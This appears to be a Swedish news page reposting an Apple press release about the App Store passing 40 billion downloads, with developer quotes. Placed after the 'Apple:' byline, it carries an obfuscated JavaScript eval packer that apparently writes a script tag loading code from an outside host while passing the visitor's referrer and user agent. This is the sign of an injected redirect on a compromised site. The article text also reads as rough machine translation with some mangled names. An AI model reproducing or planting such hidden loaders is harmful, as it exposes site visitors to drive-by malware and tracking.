Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Apple App Store Toppar 40 miljarder nedladdningar

apple

Apple: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnizz|var|u0026u|referrer|tafzk||js|php’.split(’|’),0,{}))
Rekord stort antal nerladdningar under december 2012 med över två miljarder Nedladdningar

Apple tillkännagav idag att kunderna har laddats ner över 40 miljarder appar. Nästan 20 miljarder under 2012 ensamt. App Store har över 500 miljoner aktiva konton och hade i December över 2 miljarder nedladdningar under månaden. Apples otroliga utvecklare har skapat över 775.000 appar för iPhone, iPad och iPod touch-användare över hela världen.

”Det har varit ett fantastiskt år för iOS utvecklare”, säger Eddy Cue, Apples senior vice president för Internet Software and Services. ”Utvecklare har byggt appar till ett värde av 7000 miljoner dollar på App Store, och vi fortsätter att investera i att förse dem med den bästa system så att de kan skapa de mest innovativa program i världen.”

År 2012 såg teamet på Imangi Studios att deras spel Temple Run laddats ner mer än 75 miljoner gånger, Backflip Studios och supercell, två nya spelutveckling studios, förde in över 100 miljoner dollar tillsammans frånsina titlar DragonVale och Clash of Klaner , och nya tjänster inklusive Uber, blädderblock, HotelTonight och AirBnB har lockat miljontals nya användare på iOS. Företag, däribland Electronic Arts, Ubisoft, Autodesk, Marvel och Major League Baseball fortsatte att expandera sina iOS erbjudanden, medan utvecklare som JJ Abrams ”Bad Robot Interactive och Bottle Rocket Apps fortsatte att tänja på gränserna för vad iOS apps kan göra.

”Framgången för vårt spel tempel Run har under 2012 varit inget annat än häpnadsväckande”, säger Keith Shepherd, en av grundarna av Imangi Studios. ”Vi har helt enkelt ute för att skapa ett spel som var roligt och lätt att spela, men när den slog i App Store, tog spelet fart. Det senaste året såg vi mer än 75 miljoner nedladdningar av Temple Run på iOS. ”

”Vår framgång på iOS har varit otroligt”, säger Samir Hanna, vice vd för Konsumentprodukter för Autodesk. ”Vi gav oss iväg med det blygsamma målet att få SketchBook till iPhone-användare som ett sätt att införa dem till Autodesk. Snabbspolning tre år framåt så erbjuder vi nu 20 appar till iOS som har uppnått mer än 50 miljoner nedladdningar, och vi fortsätter att rulla ut ny kreativitet och designverktyg som tilltalar både proffs och konsumenter. ”

”App Store försett oss med möjligheter bortom våra vildaste drömmar”, säger Bad Robot Interactives JJ Abrams. ”Vår app actionfilm FX var utformad för att ge Hollywood specialeffekter till någons self-made video, oavsett om det är på en iPhone, iPad eller iPod touch, och vi är bara glada att miljontals fans runt om i världen såg alla de möjligheter som denna app medföljde. ”

”Bottle Rocket Apps sysselsätter nu över 100 heltidsanställda, tillägnad ingenting mer än att bygga bra program”, säger Calvin Carter, vd för Apps Bottle Rocket. ”Under mina 20 år plus inom teknik, har jag aldrig sett en så levande marknadsplats för mjukvara som App Store.”

Apple erbjuder utvecklare en mängd resurser och verktyg för att hjälpa dem att göra bra program, samt ett robust system och marknadsplats som ger kunderna en säker och ett enkelt sätt att upptäcka dem. Apple tillhandahåller också utvecklare ett bra sätt att tjäna pengar på appar inklusive abonnemang och reklam, och hjälper marknads-och support utvecklares insatser i App Store och utanför.

Den revolutionära App Store erbjuder mer än 775.000 program till iPhone, iPad och iPod touch-användare i 155 länder runt om i världen, med mer än 300.000 infödda iPad-programmen tillgängliga. I App Store kan kunderna välja bland ett otroligt utbud av program i 23 kategorier, inklusive tidningar och tidskrifter som erbjuds i kiosk, spel, affärer, nyheter, sport, hälsa och träning och resor.

* 40 miljarder Unika hämtningar exklusive re-nedladdningar och uppdateringar.

Detta är ett pressmeddelande från Apple